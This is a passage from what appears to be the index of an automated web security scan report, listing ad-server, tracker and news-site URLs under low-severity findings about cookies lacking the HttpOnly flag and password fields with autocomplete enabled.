11.188. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==
11.189. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99
11.190. http://usadmm.dotomi.com/dmm/servlet/dmm
11.191. http://vads.adbrite.com/vast/adserver
11.192. http://vlog.leadforce1.com/bf/bf.php
11.193. http://www.att.com/u-verse/availability/
11.194. http://www.bradsdeals.com/dealsoftheday/subscribe/b
11.195. http://www.giganews.com/
11.196. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact
11.197. http://www.google.com/sorry/
11.198. http://www.google.com/sorry/Captcha
11.199. http://www.nntpserver.com/gl/
12. Cookie without HttpOnly flag set
12.1. http://ads.adxpose.com/ads/ads.js
12.2. http://afe.specificclick.net/
12.3. http://alerts.4info.com/alert/ads/dispatcher.jsp
12.4. http://alerts.4info.com/alert/ads/fastTrackAlerts.js
12.5. http://blekko.com/a/e
12.6. http://blekko.com/a/favicon
12.7. http://blekko.com/a/track
12.8. http://blekko.com/autocomplete
12.9. http://event.adxpose.com/event.flow
12.10. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
12.11. http://pixel.adsafeprotected.com/jspix
12.12. http://sales.liveperson.net/visitor/addons/deploy.asp
12.13. http://www-304.ibm.com/support/operations/us/en/orderdelivery
12.14. http://www.ibm.com/developerworks/forums/comment.jspa
12.15. http://www.ibm.com/developerworks/utils/ratingJSON.jsp
12.16. http://www.mailjet.com/
12.17. http://www.mailjet.com/pricing
12.18. https://www.mailjet.com/signup
12.19. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
12.20. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
12.21. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
12.22. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
12.23. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
12.24. http://www.tmz.com/reset-password/
12.25. http://www.tmz.com/signin/
12.26. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
12.27. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
12.28. http://www.toofab.com/category/celeb-couples/
12.29. http://www.toofab.com/news/
12.30. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp
12.31. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp
12.32. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp
12.33. http://27.xg4ken.com/media/redir.php
12.34. http://2912a.v.fwmrm.net/ad/l/1
12.35. http://2912a.v.fwmrm.net/ad/l/1
12.36. http://2912a.v.fwmrm.net/ad/l/1
12.37. http://2912a.v.fwmrm.net/ad/p/1
12.38. http://a.collective-media.net/adj/cm.rev_bostonherald/
12.39. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience
12.40. http://a.collective-media.net/adj/q1.bosherald/be_news
12.41. http://a.collective-media.net/adj/q1.bosherald/ent_fr
12.42. http://a.collective-media.net/adj/q1.bosherald/news
12.43. http://a.collective-media.net/cmadj/cm.rev_bostonherald/
12.44. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience
12.45. http://a.collective-media.net/cmadj/q1.bosherald/be_news
12.46. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr
12.47. http://a.collective-media.net/cmadj/q1.bosherald/news
12.48. http://a.tribalfusion.com/i.cid
12.49. http://a.tribalfusion.com/j.ad
12.50. http://a.tribalfusion.com/z/i.cid
12.51. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2
12.52. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3
12.53. http://ad.doubleclick.net/adj/q1.bosherald/be_news
12.54. http://ad.doubleclick.net/adj/q1.bosherald/news
12.55. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups
12.56. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice
12.57. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk
12.58. http://ad.yieldmanager.com/imp
12.59. http://ad.yieldmanager.com/pixel
12.60. http://ads.lucidmedia.com/clicksense/pixel
12.61. http://adserver.teracent.net/tase/ad
12.62. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew
12.63. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew
12.64. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php
12.65. http://apis.google.com/js/plusone.js
12.66. http://ar.voicefive.com/b/recruitBeacon.pli
12.67. http://ar.voicefive.com/b/wc_beacon.pli
12.68. http://ar.voicefive.com/bmx3/broker.pli
12.69. http://attuverseoffers.com/tv_hsi_bundles/index.php
12.70. http://b.scorecardresearch.com/b
12.71. http://b.scorecardresearch.com/p
12.72. http://b.scorecardresearch.com/r
12.73. http://b.voicefive.com/b
12.74. http://b.voicefive.com/p
12.75. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2
12.76. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0
12.77. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx
12.78. http://c.statcounter.com/t.php
12.79. http://cdnt.meteorsolutions.com/api/setid
12.80. http://cdnt.meteorsolutions.com/api/track
12.81. http://cdnt.meteorsolutions.com/api/track
12.82. http://clk.atdmt.com/go/335787632/direct
12.83. http://cpanel.app9.hubspot.com/salog.js.aspx
12.84. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js
12.85. http://d7.zedo.com/img/bh.gif
12.86. http://d7.zedo.com/utils/ecSet.js
12.87. http://dc.tremormedia.com/comp.gif
12.88. http://dc.tremormedia.com/crossdomain.xml
12.89. http://dc.tremormedia.com/st.gif
12.90. http://forums.cpanel.net/calendar.php
12.91. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
12.92. http://g2.gumgum.com/services/get
12.93. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/
12.94. http://i.w55c.net/a.gif
12.95. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard
12.96. http://image2.pubmatic.com/AdServer/Pug
12.97. http://imp.fetchback.com/serve/fb/adtag.js
12.98. http://imp.fetchback.com/serve/fb/imp
12.99. http://info.mailtraq.com/142/
12.100. http://info.mailtraq.com/716/
12.101. http://info.mailtraq.com/imap
12.102. http://info.mailtraq.com/wac
12.103. http://leadback.advertising.com/adcedge/lb
12.104. http://leadback.advertising.com/adcedge/lb
12.105. http://livechat.iadvize.com/chat_init.js
12.106. http://livechat.iadvize.com/rpc/referrer.php
12.107. http://loadm.exelator.com/load/
12.108. http://log.go.com/log
12.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom
12.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle
12.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1
12.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top
12.113. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom
12.114. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle
12.115. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1
12.116. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top
12.117. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01
12.118. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom
12.119. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle
12.120. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top
12.121. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01
12.122. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
12.123. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
12.124. http://odb.outbrain.com/utils/get
12.125. http://omg.yahoo.com/photos/what-were-they-thinking/5203
12.126. http://ping.crowdscience.com/ping.js
12.127. http://q1.checkm8.com/adam/detect
12.128. http://q1.checkm8.com/adam/report
12.129. http://r.turn.com/r/beacon
12.130. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/
12.131. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653
12.132. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome
12.133. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work
12.134. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle
12.135. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome
12.136. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome
12.137. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
12.138. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
12.139. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
12.140. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
12.141. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle
12.142. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
12.143. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle
12.144. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle
12.145. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
12.146. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome
12.147. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome
12.148. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
12.149. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome
12.150. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1
12.151. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
12.152. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D
12.153. http://receive.inplay.tubemogul.com/StreamReceiver/services
12.154. http://rs.gwallet.com/r1/pixel/x420r2425801
12.155. http://rt.legolas-media.com/lgrt
12.156. http://rt1302.infolinks.com/action/doq.htm
12.157. http://rt1701.infolinks.com/action/doq.htm
12.158. http://rt1702.infolinks.com/action/doq.htm
12.159. http://rt1803.infolinks.com/action/doq.htm
12.160. http://rt1804.infolinks.com/action/doq.htm
12.161. http://rt1901.infolinks.com/action/doq.htm
12.162. http://rt1903.infolinks.com/action/doq.htm
12.163. http://sales.liveperson.net/hc/25199332/
12.164. http://sales.liveperson.net/hc/25199332/
12.165. http://search.yahoo.com/search
12.166. http://sensor2.suitesmart.com/sensor4.js
12.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.178. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.179. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.184. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.185. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.186. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.187. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.188. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.189. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.190. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.191. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.192. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.193. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.194. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.195. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.196. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.197. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.198. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.199. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.200. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.201. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.212. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.213. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.214. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.215. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.216. http://showadsak.pubmatic.com/AdServer/AdServerServlet
12.217. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf
12.218. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782
12.219. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right
12.220. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right-2
12.221. http://tag.admeld.com/ad/js/221/tmz/300x250/bf-top-right
12.222. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf
12.223. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf_2
12.224. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr
12.225. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr_2
12.226. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_inpost
12.227. http://tag.admeld.com/ad/js/221/tmz/300x250/ros_inpage
12.228. http://tag.admeld.com/ad/js/221/tmz/300x250/toofab_ros
12.229. http://tag.admeld.com/ad/js/221/tmz/728x90/homepage_atf
12.230. http://tag.admeld.com/ad/js/221/tmz/728x90/ros
12.231. http://tag.admeld.com/ad/js/221/tmz/728x90/toofab_ros
12.232. http://tag.admeld.com/ad/js/610/unified/300x250/bh_656864_29757991
12.233. http://tag.admeld.com/match
12.234. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
12.235. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html
12.236. http://tag.admeld.com/passback/js/221/tmz/300x250/28/meld.js
12.237. http://tag.admeld.com/passback/js/221/tmz/300x250/49/meld.js
12.238. http://tag.admeld.com/passback/js/221/tmz/728x90/28/meld.js
12.239. http://tag.admeld.com/passback/js/221/tmz/728x90/49/meld.js
12.240. http://tag.admeld.com/passback/js/610/unified/300x250/8/meld.js
12.241. http://tag.contextweb.com/TagPublish/GetAd.aspx
12.242. http://tag.contextweb.com/TagPublish/GetAd.aspx
12.243. http://tenzing.fmpub.net/
12.244. http://testdm.travelers.com/trvwics.gif
12.245. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif
12.246. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif
12.247. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif
12.248. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif
12.249. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif
12.250. http://traffic.outbrain.com/network/redir
12.251. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==
12.252. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99
12.253. http://usadmm.dotomi.com/dmm/servlet/dmm
12.254. http://usenetjunction.com/scripts/track.php
12.255. http://vads.adbrite.com/vast/adserver
12.256. http://vlog.leadforce1.com/bf/bf.php
12.257. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif
12.258. http://www.att.com/u-verse/availability/
12.259. http://www.bradsdeals.com/dealsoftheday/subscribe/b
12.260. http://www.elfqrin.com/hacklab/pages/nntpserv.php
12.261. http://www.enstarllc.com/
12.262. http://www.giganews.com/
12.263. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact
12.264. http://www.google.com/sorry/
12.265. http://www.google.com/sorry/Captcha
12.266. http://www.googleadservices.com/pagead/aclk
12.267. http://www.ibm.com/search/csass/search
12.268. http://www.ibm.com/search/csass/search/
12.269. http://www.mailtraq.com/30day
12.270. http://www.nntpserver.com/gl/
12.271. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp
13. Password field with autocomplete enabled
13.1. http://dw1.s81c.com/common/js/dynamicnav.js
13.2. http://forums.cpanel.net/calendar.php
13.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
13.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
13.5. http://jcp.org/en/jsr/all
13.6. http://www.actvalue.com/
13.7. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp
13.8. http://www.easynews.com/
13.9. http://www.easynews.com/whyeasynews.html
13.10. https://www.easynews.com/signup/
13.11. http://www.giganews.com/
13.12. https://www.giganews.com/signup/
13.13. https://www.giganews.com/signup/billing.html
13.14. http://www.ibm.com/common/js/dynamicnav.js
13.15. http://www.ibm.com/developerworks/java/
13.16. http://www.ibm.com/developerworks/java/find/standards/
13.17. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
